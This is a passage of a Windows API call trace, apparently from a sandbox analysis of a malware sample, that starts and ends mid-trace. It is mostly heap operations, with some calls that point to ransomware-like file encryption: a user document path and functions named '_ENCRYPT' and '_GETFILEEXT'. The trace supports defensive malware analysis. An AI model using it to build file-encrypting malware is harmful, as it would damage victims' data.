RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0176.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=53, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a) returned 0x906f38 [0176.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=53, lpWideCharStr=0x906f38, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls") returned 53 [0176.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0176.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0176.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0176.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0176.449] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0176.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.451] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0176.451] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0176.452] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0176.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.453] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0176.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.453] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0176.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0176.453] CloseHandle (hObject=0x138) returned 1 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0176.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.454] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.455] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0176.455] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0176.455] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0176.455] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.456] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0176.456] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0176.456] CompareStringW (Locale=0x400, 